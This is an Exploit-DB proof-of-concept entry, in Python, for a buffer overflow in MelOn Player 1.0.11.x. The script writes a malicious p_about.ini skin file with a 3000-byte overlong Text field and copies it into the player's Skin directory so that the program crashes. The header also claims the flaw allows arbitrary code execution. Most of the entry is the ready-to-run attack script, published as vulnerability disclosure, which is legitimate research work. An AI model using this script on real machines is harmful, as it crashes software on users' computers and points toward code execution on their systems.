MelOn Player 1.0.11.x - Denial of Service (PoC)

EDB-ID:

17815

CVE:


EDB Verified:

Author:

modpr0be

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2011-09-09

Vulnerable App: 
# Exploit Title: MelOn Player 1.0.11.x Denial of Service POC
# Date: 09/09/2011
# Author: modpr0be
# Software Link: http://www.melon.co.id/cs/guide/download/player.do
# Vulnerable version: 1.0.11.x
# Tested on: Windows XP SP3 (VirtualBox 4.1.0 r73009)
# CVE : N/A
# Thanks: offsec, exploit-db, corelan-team, 5M7X, loneferret, mr_me, _sinner

#### Software description:
# Melon Player is a famous software in Indonesia to play songs that are provided by 
# the Melon portal (http://www.melon.co.id). This software can play any music 
# file types such as mp3, wav, wma, mp4, and others. This player can also play 
# the files on your local computer or by online streaming to the portal Melon. 
# The songs can also be downloaded to your local computer.
#
#### Vulnerable information:
# The main program (IDMelonPlayer.exe) suffers from a buffer overflow vulnerability 
# when opening p_about.ini file (Note: Actually, p_about.ini is a configuration file 
# as part of skin template. This file will bring the program information and can be 
# accessed on the menu (Menu → Information)), as a result of adding extra bytes to 
# parts of the file (Text section), giving the attackers possibility to run an arbitrary 
# code execution on the system that install Melon Player.
#
### Some Conditions:
# This is just the POC, it will just crash the program.
# and it's unicode ;)
#
##

#!/usr/bin/python

import os,sys,shutil,time

header=("""[MAIN]
MainStyle=SKIN
Resize=NO
Mask=YES
BGStyle=IMAGE
DefSize=0,0,427,136
Image=skin.bmp
Button=2
Slider=
Static=1
Text=4
Edit=
Combo=


[MAINBG]
TopLeft=145,389,6,21
TopCenter=153,389,11,21
TopRight=166,389,6,21
MiddleLeft=145,412,6,21
MiddleCenter=153,412,11,21
MiddleRight=166,412,6,21
BottomLeft=145,435,6,34
BottomCenter=153,435,11,34
BottomRight=166,435,6,34

[MAINMASK]
TopLeft=174,389,10,10
TopCenter=185,389,10,10
TopRight=196,389,10,10
MiddleLeft=185,389,10,10
MiddleCenter=185,389,10,10
MiddleRight=185,389,10,10
BottomLeft=174,400,10,10
BottomCenter=185,389,10,10
BottomRight=196,400,10,10


[BUTTON_1]
Name=??
ID=1001
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=410,4,13,13
NormalRect=223,389,13,13
OverRect=238,389,13,13
DownRect=253,389,13,13
DisabledRect=223,389,13,13
MaskRect=2000,0,13,13

[BUTTON_2]
Name=??
ID=1002
ResizeStyle=TOP_LEFT
Tooltip=
CheckBox=FALSE
Position=173,105,80,20
NormalRect=0,763,80,20
OverRect=0,763,80,20
DownRect=81,763,80,20
DisabledRect=162,763,80,20
MaskRect=2000,0,80,20


[STATIC_1]
Name=???_??
ID=2001
Position=20,31,72,84
TopLeft=14,478,72,84
TopCenter=
TopRight=
MiddleLeft=
MiddleCenter=
MiddleRight=
BottomLeft=
BottomCenter=
BottomRight=


[TEXT_1]
Name=popup Name sdw
ID=3701
Position=2,2,420,14
Text=MelOn Player
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=0,0,0
""")

footer=("""
[TEXT_3]
Name=????
ID=3703
Position=104,50,243,14
Text=Melon Player Version 1.0.0.101102
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0

[TEXT_4]
Name=Copyright
ID=3704
Position=104,72,303,14
Text=Copyright PT. Melon Indonesia. All Right Reserved.
Font=Arial
FontSize=12
FontBold=
Align=
FontColor=0,0,0
""")

filename="p_about.ini"
splash=os.path.abspath(filename)
skindir="C:\Program Files\MelonPlayerID\Skin"

junk = "A" * 3000

buggy=("""
[TEXT_2]
Name=popup Name
ID=3702
Position=3,3,420,14
Text="""+junk+ """
Font=Arial
FontSize=12
FontBold=
Align=CENTER
FontColor=170,170,170\r\n""")

banner=("""
[*] MelOnPlayer 1.0.11.x Denial of Service POC
[*] modpr0be[at]spentera[dot]com.
[*] thanks a lot: cyb3r.anbu | otoy :)
=====================================================
""")

file=open(filename,'w')
if os.name == 'nt':
	if os.path.isdir(skindir):
		try:
			file.write(header+buggy+footer)
			print banner
			print "[*] Creating the malicious .ini file.."
			time.sleep(2)
			print "[*] Malicious file (POC)",filename,"created.."
			print "[*] Path:",splash
			file.close()
			shutil.copy2(splash,skindir)
			print "[*] File",filename,"has been copied to",skindir
		except IOError:
			print "[-] Could not write to destination folder, check permission.."
			sys.exit()
	else:
		print "[-] Could not find Skin directory, is MelOn Player installed?"
		sys.exit()
else:
	print "[-] Please run this script on Windows."
	sys.exit()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services